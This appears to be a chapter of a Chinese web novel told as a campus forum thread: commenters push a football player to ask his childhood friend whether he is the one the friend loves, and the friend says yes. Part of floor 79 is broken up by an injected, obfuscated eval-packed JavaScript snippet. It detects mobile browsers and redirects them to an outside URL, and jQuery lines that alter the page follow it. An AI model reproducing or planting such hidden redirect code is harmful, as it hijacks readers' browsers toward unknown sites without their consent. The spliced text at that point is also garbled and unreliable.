标题:【树洞】我好像把一切都搞砸了
论坛板块:京华大学\校园生活\情感树洞
发帖人:足球不行踢球去
1楼匿名用户:
沙发!
兄弟们快来看,楼主更新了!
等等,看完内容……楼主你是真的蠢啊!!!
2楼匿名用户:
带好瓜子可乐,让我慢慢骂。
楼主,你让我说你什么好?你他妈是足球队队长,你踢球的时候不是最擅长临场发挥吗?怎么关键时刻掉链子???
3楼匿名用户:
@足球不行踢球去你是不是应该改名叫“告白不行逃跑去”?
笑死我了,看见有人告白你跑什么跑?你是足球队的又不是田径队的!
4楼匿名用户:
回3楼:哈哈哈哈哈哈夺笋啊!
不过楼主确实该骂,这么好的机会,就因为你怂,没了。
5楼匿名用户:
我来复盘一下楼主的骚操作:
1.约人吃饭准备告白?
2.看见有人抢先告白?跑路
3.对方发消息问“你在哪”?撒谎说没事
4.对方说“我有喜欢的人了”?不问是谁
5.对方说“等你问了再告诉你”?还是不问
6.凌晨两点发帖求骂醒?
总结:进攻0分,防守0分,逃跑100分!
6楼匿名用户:
回5楼:笑死,这个复盘太真实了。
楼主你踢球要是这个水平,早就被教练按在替补席了。
7楼匿名用户:
等等,我有个问题。
楼主,你说那个女生是“长发披肩,白裙子,干干净净”?
是不是还背了个帆布包,上面有个猫猫刺绣?
8楼楼主:
回7楼:……你怎么知道?
9楼匿名用户:
回8楼:卧槽,那是我室友!!!
法学院的那个!!!上周她就在宿舍说要去告白,我们全宿舍还给她出主意!!!
她回来的时候哭了,说被拒绝了,但拒绝得特别温柔,她还说“那个男生说他心里有人了”!!!
楼主!!!那个人就是你竹马啊!!!
10楼匿名用户:
破案了破案了!
顾辞拒绝了她,然后转头跟你说“我有喜欢的人了”!
这个“喜欢的人”是谁还用猜吗??
楼主你是真傻还是装傻啊???
11楼匿名用户:
@足球不行踢球去你看见了吗!!!人家女生被拒绝了!!!你跑什么跑!!!你上去就是胜利啊!!!
12楼匿名用户:
代入一下顾辞视角:
中午被一个不喜欢的女生堵着告白,好不容易处理完了,一看手机,约好吃饭的人放我鸽子。
晚上吃饭,我主动提这个事,给你递话,暗示我喜欢的人是你。
结果你装傻???
你还不问???
你让我怎么办???
13楼匿名用户:
回12楼:顾辞:我话都说到这份上了,你还让我怎样???
楼主你知不知道,顾辞那句“等你想问了再告诉我”翻译一下就是:
“我都这样了你还看不出来吗??你是不是傻???”
14楼匿名用户:
我现在特别想看顾辞发帖。
标题:【树洞】我竹马好像是个傻子,怎么办,在线等。
15楼匿名用户:
回14楼:笑死,想看+1!
内容我都帮他想好了:
“我暗示了八百遍我喜欢他,他还是不懂。昨天我连‘我有喜欢的人了’都说出来了,他居然不问我那个人是谁!我现在怀疑他脑子里装的是肌肉。”
16楼匿名用户:
回15楼:哈哈哈哈哈哈“脑子里装的是肌肉”太损了!
不过楼主确实,190的身高,190的肌肉,19的情商。
17楼匿名用户:
回16楼:19的情商??你太看得起他了,我觉得是9。
18楼匿名用户:
话说回来,楼主你分析一下:
顾辞说“我不喜欢她”的时候,语气是什么样的?
是不耐烦?还是平淡?还是别的?
19楼楼主:
回18楼:就……很平淡。
像在说“今天天气不错”那种平淡。
20楼匿名用户:
回19楼:那不就对了!
如果真的在意那个女生,或者对她有好感,拒绝的时候不会那么平淡。
他那么平淡,说明那个女生对他来说根本不重要。
重要的是谁?
是你啊傻子!!!
21楼匿名用户:
而且他紧接着就说“我有喜欢的人了”!
这个转折,这个递进,这个暗示——
楼主你要是再看不出来,我真的要去京华门口拉横幅了。
22楼匿名用户:
@足球不行踢球去你现在、立刻、马上,给顾辞发消息!
就问:“你中午说的那个人,是不是我?”
23楼匿名用户:
对!现在就发!
别等到明天了!
你现在不发,我这觉都睡不踏实!
24楼楼主:
回23楼:……现在凌晨两点多了。
他肯定睡了。
25楼匿名用户:
回24楼:你怎么知道他睡了?
万一他也睡不着呢?
万一他也在等你的消息呢?
26楼匿名用户:
回25楼:有道理!
楼主你想想,他说那句话的时候,是不是也在等你的反应?
你没问,他是不是很失望?
他现在可能也躺在床上,盯着手机,等你发消息!
27楼匿名用户:
代入顾辞视角:
我话都说出去了,他没问。
他是不是不喜欢我?
他是不是只把我当兄弟?
我是不是自作多情了?
然后翻来覆去睡不着。
惨不惨?你说惨不惨?
28楼匿名用户:
楼主,你忍心让他这样吗??
你忍心让他失眠吗??
你忍心让他怀疑自己吗??
29楼楼主:
回28楼:……
我不忍心。
但我还是怕。
30楼匿名用户:
怕什么怕!
你看看你第一帖到现在,你变了多少?
从“我是直男”到“我好像有点不对劲”,从“他是表姐”到“我陪你去临市”。
你已经不是原来的你了!
你已经喜欢上他了!
你现在要做的,就是承认这一点,然后告诉他!
31楼匿名用户:
回30楼:说得好!
楼主,你想想顾远洲。
他喜欢了那么多年,最后带着遗憾走了。
你想像他一样吗?
你想等十几年后,看着顾辞和别人在一起,然后一个人去看樱花吗?
32楼楼主:
回31楼:……
我不想。
33楼匿名用户:
那不就结了!
现在就去!
发消息!
就问!
34楼匿名用户:
姐妹们,我来帮楼主编辑消息:
“睡了吗?”
“我想问你一个问题。”
“你晚上说的那个人,是我吗?”
35楼匿名用户:
回34楼:太正式了!
应该发:
“睡了没?”
“你那个人,是不是我?”
简单粗暴,符合体育生人设。
36楼匿名用户:
回35楼:哈哈哈哈哈哈“你那个人”是什么鬼!
但确实很楼主风格。
37楼匿名用户:
我觉得可以发:
“圆圆。”
“我有话想问你。”
“你喜欢的那个傻逼,是不是我?”
38楼匿名用户:
回37楼:笑死,这什么自嘲式告白!
不过如果顾辞真的喜欢他,看到这个肯定会笑。
39楼匿名用户:
楼主,选一个发吧!
我们等你的消息!
40楼匿名用户:
等等等等,我突然想到一个问题。
万一顾辞喜欢的人真的是别人呢?
万一不是楼主呢?
41楼匿名用户:
回40楼:不可能。
你看看楼主描述的那些细节:
给他占座留靠窗的位置,因为他喜欢晒太阳。
看他进球的朋友圈会私聊夸他。
让他靠着睡,陪他去外地。
说“等你问了再告诉我”的时候看他的眼神。
这要不是喜欢,我把头拧下来。
42楼匿名用户:
回41楼:同意。
顾辞那种高岭之花,对谁都冷淡,唯独对楼主不一样。
这不是喜欢是什么?
43楼匿名用户:
而且你们还记得顾远洲吗?
顾远洲喜欢顾辞那么多年,顾辞对他什么态度?
客气,疏离,保持距离。
但对楼主呢?
让他靠着睡,让他陪着去外地,对他笑,对他温柔。
差别对待这么明显,看不出来的只有楼主本人。
44楼匿名用户:
楼主,你睁开眼睛看看吧!!!
全世界都看出来了!!!
就你不知道!!!
45楼匿名用户:
或者说,你知道,但你不敢信。
因为你太在意他了,所以怕是自己自作多情。
但你想想,你什么时候自作多情过?
他给你的那些信号,哪一个是你自己脑补的?
46楼楼主:
回45楼:……
他让我靠着他睡。
他陪我去临市。
他说“等你问了再告诉我”的时候,看我的眼神……
我以为是我想多了。
47楼匿名用户:
回46楼:不是你想多了,是你想少了!
你就是想得太少,才拖到现在!
48楼匿名用户:
楼主,我给你讲个道理:
人这一辈子,能遇到几个让你心动的人?
十四年了,你身边来来去去那么多人,只有他让你这么在意。
这不是喜欢是什么?
你要是不抓住,以后想起来,会后悔一辈子的。
49楼匿名用户:
对,你想想顾远洲。
他现在一个人在临市,发樱花照片,配文没有字。
他后悔吗?
他肯定后悔。
后悔当初没有说出来。
你想像他一样吗?
50楼楼主:
回49楼:……
不想。
我明天就去问。
51楼匿名用户:
又是明天???
楼主你上一帖就说“明天再说”,结果拖了三天。
这一帖又说“明天就去问”,不会又拖吧?
52楼匿名用户:
回51楼:就是!
楼主你要是再拖,我们真去京华拉横幅了。
53楼匿名用户:
横幅内容我都想好了:
“张扬,你他妈快表白!”
“顾辞在等你!”
“十四年了,该给个名分了!”
54楼匿名用户:
回53楼:哈哈哈哈哈哈“给个名分”是什么鬼!
不过有道理,楼主你确实该给顾辞一个名分了。
55楼匿名用户:
话说回来,楼主你有没有想过,顾辞可能也在看这个帖?
56楼匿名用户:
卧槽???
有这个可能!!!
万一顾辞也在潜水呢???
57楼匿名用户:
@圆圆是你吗???
如果是你,给个暗号!!!
58楼匿名用户:
笑死,这楼要变成认亲现场了。
59楼匿名用户:
不过说真的,如果顾辞真的在看这个帖,他应该早就知道楼主喜欢他了。
毕竟楼主这个帖子,从头到尾都在写他。
60楼匿名用户:
回59楼:是啊!
从第一帖的“黑发如墨、肤白如玉、鼻梁高挺、眼眸深邃若寒星”,
到现在的“我怕是我自作多情”。
楼主对他的喜欢,都快溢出屏幕了。
61楼匿名用户:
顾辞要是看到这个帖,肯定又甜又急。
甜的是,原来这傻子也喜欢我。
急的是,这傻子怎么还不来问我!
62楼匿名用户:
所以楼主,你赶紧去问啊!
别让顾辞等太久!
他都等了十四年了!
63楼楼主:
……
好。
我现在发。
64楼匿名用户:
啊啊啊啊啊!!!
楼主终于要发了!!!
65楼匿名用户:
截图截图!
我要见证历史!
66楼匿名用户:
楼主发了记得截图发上来!
我们要看!
67楼匿名用户:
不对,万一顾辞真的在看帖,他应该已经知道楼主会发了。
他现在是不是也拿着手机在等?
68楼匿名用户:
回67楼:代入一下顾辞视角——
刷着这个帖,看着楼主被大家骂,看着楼主终于说“我现在发”。
心跳加速,手指发抖,盯着对话框。
然后……
等楼主的消息。
69楼匿名用户:
回68楼:你别说了,我血糖要爆了。
这是什么双向暗恋的甜文剧情啊!
70楼匿名用户:
楼主呢?
发了没?
怎么还没截图?
71楼匿名用户:
是不是在编辑消息?
是不是在措辞?
是不是手抖得打不了字?
72楼匿名用户:
@足球不行踢球去你倒是吱一声啊!!!
73楼匿名用户:
急死我了!
三分钟了!
楼主你发个消息要这么久吗?
74楼匿名用户:
五分钟了!!!
不会又怂了吧???
75楼匿名用户:
@足球不行踢球去你要是敢怂,我就去你们球队门口堵你!
76楼匿名用户:
截图来了!!!
【张】:睡了吗?
【圆圆】:没。
【张】:我想问你一件事。
【圆圆】:嗯。
【张】:你晚上说的那个人……
【张】:是我吗?
77楼匿名用户:
啊啊啊啊啊啊!!!
发了!!!
真的发了!!!
78楼匿名用户:
他回了没?
他回了没?
他回了没???
79楼匿名用
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382519|200203||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
户:
@足球不行踢球去快说后续!!!
80楼匿名用户:
急死我了!
我比楼主还紧张!
81楼匿名用户:
代入一下顾辞视角——
看到这条消息,会是什么反应?
是愣住?是笑?是哭?还是直接打电话过去?
82楼匿名用户:
我觉得是笑。
笑了然后打字。
打了又删,删了又打。
最后发出去一个字。
83楼匿名用户:
一个字?
什么字?
84楼匿名用户:
“嗯。”
85楼匿名用户:
回84楼:啊???
就一个“嗯”???
这也太冷淡了吧???
86楼匿名用户:
回85楼:你懂什么!
“嗯”是最好的回答!
不是“不是”,不是“你猜”,是“嗯”!
“嗯”就是“是”!
就是“你终于问了”!
就是“我等了好久”!
87楼匿名用户:
对!!!
而且顾辞那种性格,能说“嗯”已经很好了!
他怎么可能说“是啊我好喜欢你”!
他是高岭之花啊!
88楼匿名用户:
截图呢截图呢?
楼主快发截图!
89楼楼主:
截图来了。
【圆圆】:嗯。
就这一个字。
我看着这个字,手又开始抖。
我不知道该回什么。
我想说“我也是”。
但打出来又删掉。
打了又删,删了又打。
我现在还在抖。
90楼匿名用户:
回他!!!
就说“我也是”!!!
快!!!
91楼匿名用户:
就说“我也是,我喜欢你”!
七个字!
打完就发!
92楼匿名用户:
楼主你手别抖!
深呼吸!
一、二、三!
发!
93楼楼主:
发了。
【张】:我也是。
【张】:我喜欢你。
94楼匿名用户:
啊啊啊啊啊啊啊啊啊啊!!!
发了!!!
真的发了!!!
95楼匿名用户:
他回了没?
他回了没?
顾辞怎么回的???
96楼匿名用户:
@足球不行踢球去快说!!!
97楼楼主:
他回了。
【圆圆】:我知道。
【圆圆】:我等了你好久。
98楼匿名用户:
呜呜呜呜呜呜呜!!!
“我等了你好久”!!!
我哭了!!!
99楼匿名用户:
十四年!!!
他终于等到了!!!
100楼匿名用户:
楼主你现在什么感觉???
快说快说!!!
101楼楼主:
我不知道怎么形容。
手还在抖。
眼眶有点酸。
想笑又想哭。
想现在就冲到他宿舍楼下。
但他在东区我在西区。
太远了。
102楼匿名用户:
回101楼:远什么远!
跑过去啊!
你不是体育生吗!
跑起来!
103楼匿名用户:
对!
现在就跑!
去他宿舍楼下!
当面说!
104楼匿名用户:
截图呢?
你们后面聊了什么?
快发!
105楼楼主:
【张】:我现在能去找你吗?
【圆圆】:现在?
【张】:嗯。
【圆圆】:宿舍楼已经关门了。
【张】:……
【张】:那我明天早上去给你买包子。
【圆圆】:好。
【圆圆】:我等你。
106楼匿名用户:
“我等你”!!!
又是“我等你”!!!
他等了你十四年!!!
明天早上还要等你!!!
107楼匿名用户:
楼主你明天一定要去!
买两笼虾仁!
不,买三笼!
告诉他以后都不用等了!
你来了!
108楼匿名用户:
呜呜呜呜呜呜呜我这个老母亲终于放心了!!!
儿子终于开窍了!!!
109楼匿名用户:
追了四帖,从第一帖的“我是直男”到现在,楼主你终于成长了!
110楼匿名用户:
所以现在问题来了:
你们明天早上见面会说什么?
会不会直接在一起?
会不会拥抱?
会不会……
111楼匿名用户:
回110楼:会不会什么你倒是说啊!
会不会亲???
112楼匿名用户:
哈哈哈哈哈哈别问了!
楼主脸皮薄,会害羞的!
113楼匿名用户:
@足球不行踢球去明天记得来更新!
我们要看后续!
114楼楼主:
好。
明天一定来。
现在……
现在我想再给他发条消息。
115楼匿名用户:
发什么?
快说!
116楼楼主:
【张】:圆圆。
【张】:晚安。
【圆圆】:晚安,张扬。
117楼匿名用户:
呜呜呜呜呜这个名字!!!
他叫你全名!!!
但听起来好温柔!!!
118楼匿名用户:
行了行了,我们该睡了。
楼主也该睡了。
明天还有大事要办!
119楼匿名用户:
祝楼主明天顺利!
祝楼主和顾辞幸福!
祝顾远洲也能找到自己的幸福!
120楼匿名用户:
这个帖我从第一页追到现在,见证了楼主的成长。
从“竹马脱单了如何调理”到“我有喜欢的人了”。
从“我是直男”到“我喜欢你”。
楼主,你真的长大了。
121楼匿名用户:
晚安楼主。
晚安顾辞。
晚安这个美好的夜晚。
——
张扬把手机放到枕边。
窗外的月光从窗帘缝隙里漏进来,薄薄的一层,落在他的被子上。
他看着那条消息。
【圆圆】:晚安,张扬。
他翻了个身,把脸埋进枕头里。
嘴角不自觉地翘起来。
他想起刚才发“我喜欢你”的时候,手抖得差点把手机扔出去。
他想起看到那个“嗯”的时候,心跳快得像刚踢完一场加时赛。
他想起他说“我等了你好久”的时候,眼眶酸得差点没忍住。
十四年了。
他终于说出来了。
他也终于等到了。
窗外很静。
京华的夜总是很静。
但张扬睡不着。
他满脑子都是明天早上。